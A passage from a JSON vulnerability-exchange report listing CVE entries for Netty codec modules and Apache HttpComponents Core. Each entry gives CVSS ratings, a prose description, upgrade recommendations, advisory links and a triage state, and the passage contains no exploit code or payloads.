      "id": "CVE-2026-59919",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
        }
      ],
      "cwes": [
        93
      ],
      "description": "Netty is an asynchronous, event-driven network application framework. In versions prior to 4.1.136.Final and 4.2.16.Final, Netty's HAProxy encoder (\u00a0HAProxyMessageEncoder\u00a0) writes AF_UNIX source and destination socket addresses into the HAProxy V1 text protocol without validating them for CRLF characters, so an attacker who controls an AF_UNIX address can inject \u00a0\\r\\n\u00a0 sequences and split the single PROXY header into multiple lines. This is possible because the V1 protocol uses CRLF as its line terminator and, unlike IPv4/IPv6 addresses whose format checks implicitly reject CRLF, AF_UNIX addresses are only validated for length (up to 108 bytes), allowing a forged second PROXY header line that spoofs the client source/destination IP to a downstream server or load balancer. The issue is fixed in versions 4.1.136.Final and 4.2.16.Final.",
      "recommendation": "Upgrade io.netty:netty-codec-haproxy to version 4.2.16.Final, 4.1.136.Final",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-59919"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-59919"
        },
        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.1.136.Final"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.2.16.Final"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-wh89-7897-x99h"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59919"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-59919"
        }
      ],
      "published": "2026-07-29T18:16:56+00:00",
      "updated": "2026-08-06T20:33:28+00:00",
      "affects": [
        {
          "ref": "pkg:maven/io.netty/netty-codec-haproxy@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-haproxy@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:50fb2294-f11b-414d-a002-8a150d5f35e2/1#f3a3c0ba-128a-4930-b392-bd3c965a2d91"
        },
        {
          "ref": "urn:cdx:36048e5d-22a1-48a8-8b91-d48b353ddac7/1#pkg:maven/io.netty/netty-codec-haproxy@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:ea5ed770-fbdf-4f09-96ee-b278412c62d3/1#pkg:maven/io.netty/netty-codec-haproxy@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:31443ff6-1226-453d-ad8c-b0b839b16266/1#ef7f4f9f-98ff-4b34-add2-bdecaf246392"
        },
        {
          "ref": "urn:cdx:5a41366f-81c7-467f-a944-b70c66237100/1#pkg:maven/io.netty/netty-codec-haproxy@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:926511d8-a5cf-4677-a808-9889fa46da3a/1#pkg:maven/io.netty/netty-codec-haproxy@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#9c549336-282b-483c-84bd-2fcf3f772647"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#f43b8b71-ced6-44cc-bab3-b6d233fd5b07"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#93960962-02f2-44f6-b796-d503c9207f2d"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#c70a7036-032f-44d9-a030-0ccc9df17a5c"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#fcddbfef-dd62-4a27-add9-d27c73f5eb82"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#f91053db-75e5-48e1-b89d-fc9fff022d0c"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#d41885c5-4e8a-4fc4-8fe5-351ba1848ee8"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#e6988e38-6131-41ad-870b-699bcf8b15a0"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:maven/io.netty/netty-codec-haproxy@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:maven/io.netty/netty-codec-haproxy@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:maven/io.netty/netty-codec-haproxy@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#4be3db44-1326-4438-8b49-68205b3d2132"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-59920",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
        }
      ],
      "cwes": [
        93
      ],
      "description": "Netty is an asynchronous, event-driven network application framework. In versions prior to 4.1.136.Final and 4.2.16.Final, Netty's STOMP encoder (\u00a0StompSubframeEncoder\u00a0) does not escape or validate header values in \u00a0CONNECT\u00a0 and \u00a0CONNECTED\u00a0 frames, so raw newline (\u00a0\\n\u00a0) characters in a header value are written directly to the wire, allowing an attacker who controls a header value to inject additional STOMP headers. This happens because the encoder intentionally skips escaping for CONNECT/CONNECTED frames per the STOMP 1.2 specification but never rejects the raw newlines, and since a broker parses each line as a separate header, an attacker controlling a value such as a user-supplied login or passcode can overwrite connection parameters or add authentication/role headers to bypass authentication or escalate privileges (the actual impact is broker-dependent). The issue is fixed in versions 4.1.136.Final and 4.2.16.Final.",
      "recommendation": "Upgrade io.netty:netty-codec-stomp to version 4.2.16.Final, 4.1.136.Final",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-59920"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-59920"
        },
        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.1.136.Final"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.2.16.Final"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-3g8r-4pfx-jmfh"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59920"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-59920"
        }
      ],
      "published": "2026-07-29T18:16:56+00:00",
      "updated": "2026-08-06T20:34:47+00:00",
      "affects": [
        {
          "ref": "pkg:maven/io.netty/netty-codec-stomp@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-stomp@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:50fb2294-f11b-414d-a002-8a150d5f35e2/1#73d99851-e7b6-426d-9ec0-688e03aafcb7"
        },
        {
          "ref": "urn:cdx:ea5ed770-fbdf-4f09-96ee-b278412c62d3/1#pkg:maven/io.netty/netty-codec-stomp@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:31443ff6-1226-453d-ad8c-b0b839b16266/1#b1ba5afb-3a3f-434b-984f-ea95aa6666cd"
        },
        {
          "ref": "urn:cdx:5a41366f-81c7-467f-a944-b70c66237100/1#pkg:maven/io.netty/netty-codec-stomp@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:926511d8-a5cf-4677-a808-9889fa46da3a/1#pkg:maven/io.netty/netty-codec-stomp@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#c6792ca5-17ce-43b5-a307-ad853746941d"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#ecce4967-72b5-484c-bde8-16a72d7fc6c8"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#e3d80e6b-653f-4f9f-8f8e-689777180bdd"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#e91a2a22-e63d-4bd0-86a6-28533f2aa6a2"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#b5317d68-c85a-45f5-bd49-e861a6e2f263"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#cf55e37d-3b28-4878-844e-ca11c5419af0"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#69505a19-3d2a-4a91-85a5-053ae2eacd72"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#90f126c7-ea6a-43c5-ad18-db95384d4dc8"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:maven/io.netty/netty-codec-stomp@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:maven/io.netty/netty-codec-stomp@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#fb523247-755f-4b16-a989-9e3d825125c9"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-59921",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 5.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
        }
      ],
      "cwes": [
        93
      ],
      "description": "Netty is an asynchronous, event-driven network application framework. Prior to versions 4.1.136.Final and 4.2.16.Final, HttpPostRequestEncoder constructs multipart HTTP request bodies by directly concatenating user-supplied filenames and field names into Content-Disposition MIME headers without validating or sanitizing CRLF characters (\\r\\n). Since MIME headers are delimited by CRLF, an attacker who controls the filename can inject arbitrary MIME headers into the multipart body part. The root cause is that neither the encoder nor the FileUpload implementations' setFilename() methods, which only check for null, neutralize CRLF characters before the filename is embedded into the header. This issue has been fixed in versions 4.1.136.Final and 4.2.16.Final.",
      "recommendation": "Upgrade io.netty:netty-codec-http to version 4.2.16.Final, 4.1.136.Final",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-59921"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-59921"
        },
        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.1.136.Final"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.2.16.Final"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-gcjf-9mgh-3p7g"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59921"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-59921"
        }
      ],
      "published": "2026-07-28T23:17:09+00:00",
      "updated": "2026-08-07T15:05:47+00:00",
      "affects": [
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:50fb2294-f11b-414d-a002-8a150d5f35e2/1#59482894-99d8-4e97-9ad6-82555a5a8f66"
        },
        {
          "ref": "urn:cdx:36048e5d-22a1-48a8-8b91-d48b353ddac7/1#e9270d8f-ac37-46a9-ba4d-bccbb3434099"
        },
        {
          "ref": "urn:cdx:7d56b569-5272-47f2-a33d-d86bd677f6c9/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:ea5ed770-fbdf-4f09-96ee-b278412c62d3/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:0a2a2284-e186-40c4-84a6-9946617cb8d0/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:31443ff6-1226-453d-ad8c-b0b839b16266/1#efded87b-2e1f-45f1-b20f-daf47fabfdd6"
        },
        {
          "ref": "urn:cdx:5a41366f-81c7-467f-a944-b70c66237100/1#d664916f-0188-4c6d-976a-a95e5b004984"
        },
        {
          "ref": "urn:cdx:e7f0e99d-6e24-448f-8ce9-0d3e2dfc36a2/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:fe1a73d2-1fae-4971-95ae-518949f1e0d6/1#b5155b1d-7e63-430d-9004-8520ee029169"
        },
        {
          "ref": "urn:cdx:926511d8-a5cf-4677-a808-9889fa46da3a/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#c755cc34-3f6d-447c-b113-46440a5e6657"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#b516514f-e0f6-44e9-b5f5-2db4c89a2fa9"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#ecd9c6d7-21be-4329-8bd2-64415b7c67e8"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#f50d8d8f-9f83-4d24-a8be-069154322809"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#fba45fa2-71ff-40da-bbb8-a08bd44cf523"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#bab7766f-9268-4e06-a706-63ef52378b94"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#ffd958be-72a4-4c81-b800-2b6b152841a3"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#f46bd9c5-bbb4-4905-a7e5-87b2cdfa4b07"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#df1f0e67-c2af-4b0a-bc27-0a1d04477689"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#fb09ca96-2de8-4848-83ef-0df6c1b392fe"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#e987c11d-07b4-49db-ab1c-0a2f02c125fe"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#72448050-828a-4fa4-af95-d1e062179c95"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#d612726f-976c-49db-8573-9ddb341ea8ba"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#8ce216c4-3956-4ece-9ac2-5db5191ada51"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#e89047a4-0a3b-4cfb-88c0-ceca6523232d"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-73507",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        400
      ],
      "description": "Netty is an asynchronous, event-driven network application framework. Prior to 4.1.136.Final and 4.2.16.Final, io.netty.handler.codec.xml.XmlFrameDecoder.decode() failed to preserve closing-tag parser state across invocations, so an unauthenticated remote attacker could trickle-feed repeated </ sequences that repeatedly rescanned the accumulated buffer and exhausted an EventLoop thread's CPU, causing denial of service with a maxFrameLength of 1 MB. This issue is fixed in versions 4.1.136.Final and 4.2.16.Final.",
      "recommendation": "Upgrade io.netty:netty-codec-xml to version 4.2.16.Final, 4.1.136.Final",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-73507"
        },
        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/commit/5b68c61f37aa4a3045cba624cbea239655c9003b"
        },
        {
          "url": "https://github.com/netty/netty/commit/bb2ff68a1fb71cb4b0eb9a9e17b66c52aff680c6"
        },
        {
          "url": "https://github.com/netty/netty/pull/17063"
        },
        {
          "url": "https://github.com/netty/netty/pull/17065"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.1.136.Final"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.2.16.Final"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-v74w-7mr3-4qg3"
        }
      ],
      "published": "2026-08-13T15:20:17+00:00",
      "updated": "2026-08-15T04:18:25+00:00",
      "affects": [
        {
          "ref": "pkg:maven/io.netty/netty-codec-xml@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-xml@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:50fb2294-f11b-414d-a002-8a150d5f35e2/1#d14b7302-5dce-4bdf-9831-0a334d9ce0a6"
        },
        {
          "ref": "urn:cdx:ea5ed770-fbdf-4f09-96ee-b278412c62d3/1#pkg:maven/io.netty/netty-codec-xml@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:31443ff6-1226-453d-ad8c-b0b839b16266/1#e748e892-9caa-41ab-87bd-435a4fc262a2"
        },
        {
          "ref": "urn:cdx:5a41366f-81c7-467f-a944-b70c66237100/1#pkg:maven/io.netty/netty-codec-xml@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:926511d8-a5cf-4677-a808-9889fa46da3a/1#pkg:maven/io.netty/netty-codec-xml@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#dd085405-277c-4d54-8fa6-1f2af0ccfbaa"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#ae7e4b17-3f2e-4ca6-a310-80be12c1c120"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#8cf7afe2-0e33-47c5-aa9c-44b97bdc5563"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#cca7f866-2709-4ae3-8177-02514ef1ddb9"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#f438b2a1-0042-4b82-819b-831c1de90cac"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#c0090766-ef21-4c63-8500-0c8cec9e36c9"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#f6d50807-7e62-4f3e-8981-14e0b8c23023"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#5c6f36d1-4d87-497d-84fd-1e2f7bce1436"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:maven/io.netty/netty-codec-xml@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:maven/io.netty/netty-codec-xml@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#ee317a88-e6fc-45b7-936d-a240c8fa2281"
        }
      ],
      "analysis": {
        "state": "in_triage",
        "justification": "",
        "response": [],
        "detail": "This CVE is under investigation by Confluent."
      }
    },
    {
      "id": "CVE-2026-73508",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        772
      ],
      "description": "Netty is an asynchronous, event-driven network application framework. Prior to 4.1.136.Final and 4.2.16.Final, io.netty.handler.codec.dns.AbstractDnsRecord, io.netty.handler.codec.dns.DefaultDnsRecordDecoder.decodeRecord(), and io.netty.handler.codec.dns.DnsCodecUtil.decompressDomainName() failed to release retained or newly allocated ByteBuf objects when IDN.toASCII() or encodeDomainName() rejected a malformed domain name, allowing unauthenticated remote DNS packets to leak direct memory incrementally until denial of service. This issue is fixed in versions 4.1.136.Final and 4.2.16.Final.",
      "recommendation": "Upgrade io.netty:netty-codec-dns to version 4.2.16.Final, 4.1.136.Final",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-73508"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-73508"
        },
        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/commit/5b68c61f37aa4a3045cba624cbea239655c9003b"
        },
        {
          "url": "https://github.com/netty/netty/commit/bb2ff68a1fb71cb4b0eb9a9e17b66c52aff680c6"
        },
        {
          "url": "https://github.com/netty/netty/pull/17063"
        },
        {
          "url": "https://github.com/netty/netty/pull/17065"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.1.136.Final"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.2.16.Final"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-mfg7-5gfp-c4w3"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-73508"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-73508"
        }
      ],
      "published": "2026-08-13T15:20:17+00:00",
      "updated": "2026-08-13T18:18:17+00:00",
      "affects": [
        {
          "ref": "pkg:maven/io.netty/netty-codec-dns@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-dns@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:50fb2294-f11b-414d-a002-8a150d5f35e2/1#8df7e702-490b-4de5-9dcd-e3b2c0a9b0aa"
        },
        {
          "ref": "urn:cdx:36048e5d-22a1-48a8-8b91-d48b353ddac7/1#pkg:maven/io.netty/netty-codec-dns@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:ea5ed770-fbdf-4f09-96ee-b278412c62d3/1#pkg:maven/io.netty/netty-codec-dns@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:0a2a2284-e186-40c4-84a6-9946617cb8d0/1#pkg:maven/io.netty/netty-codec-dns@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:31443ff6-1226-453d-ad8c-b0b839b16266/1#b8346279-aec3-4c22-9657-f91eead3d507"
        },
        {
          "ref": "urn:cdx:5a41366f-81c7-467f-a944-b70c66237100/1#pkg:maven/io.netty/netty-codec-dns@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:fe1a73d2-1fae-4971-95ae-518949f1e0d6/1#b77b52cc-d202-4c57-8339-cd73570acca9"
        },
        {
          "ref": "urn:cdx:926511d8-a5cf-4677-a808-9889fa46da3a/1#pkg:maven/io.netty/netty-codec-dns@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#f91b5487-db5b-4a92-8e9f-ddd6c3bfd701"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#e8b7ac3a-98c2-4355-aef3-a32c93b86766"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#8209685d-13af-4756-911f-fa3de50868e3"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#ada7176e-e67a-4ac0-8676-383bf78c5215"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#e493cef4-41a6-4125-808d-b0190f47fb1d"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#e312c8d7-2d26-478e-aed2-a3d7bbe7d1e4"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#edcff987-9bcd-433d-b4a2-6b2a4e9690c6"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#ff8e1182-b5d8-493f-8381-46a558bff107"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#dc20b67a-1131-4bd4-ac52-341fc7e3a2af"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#bbc4cdf5-df0e-4092-a516-3ec2291fe51b"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#956ad17b-635c-4772-99ed-22427c3a24ce"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:maven/io.netty/netty-codec-dns@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:maven/io.netty/netty-codec-dns@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:maven/io.netty/netty-codec-dns@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#8a01d33f-4d5c-4345-ad06-128204ed06ed"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-54399",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ghsa"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        400
      ],
      "description": "Uncontrolled Resource Consumption vulnerability in the HTTP/1.1 message parser\u00a0in Apache HttpComponents Core (5.4.2 and earlier, 5.5-beta1 and earlier) allows\u00a0an remote attacker to cause a denial of service through memory exhaustion by sending messages with excessive number of headers / excessive header length",
      "recommendation": "Upgrade org.apache.httpcomponents.core5:httpcore5 to version 5.4.3, 5.5-beta2",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-54399"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/07/01/4"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-54399"
        },
        {
          "url": "https://github.com/apache/httpcomponents-core"
        },
        {
          "url": "https://github.com/apache/httpcomponents-core/commit/d96a00fec9b2e19f8005e35681df5f6cd6e21a9e"
        },
        {
          "url": "https://github.com/apache/httpcomponents-core/commit/fdc53a32fe0fccf098cc67e71cd125e447c759ed"
        },
        {
